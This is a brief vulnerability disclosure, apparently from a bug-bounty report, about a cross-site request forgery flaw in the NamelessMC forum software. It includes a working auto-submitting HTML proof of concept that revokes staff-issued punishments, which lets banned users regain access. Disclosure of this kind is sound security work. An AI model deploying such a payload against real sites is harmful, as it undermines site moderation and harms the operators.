Cross-Site Request Forgery (CSRF) in namelessmc/nameless
Sep 24th 2021
With this CSRF any user is able to remove any punishment on any user made by the staff.
Proof of Concept
After you log in, open this POC.html in a browser. This will remove any punishment that's specified in the POC.
<body> <script>history.pushState('', '', '/')</script> <form action="https://example.com/panel/users/punishments/?user=2&do=revoke&id=1"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This specific POC will remove the 1st punishment from the userid 2.
This vulnerability is capable of allowing banned users to re access the site.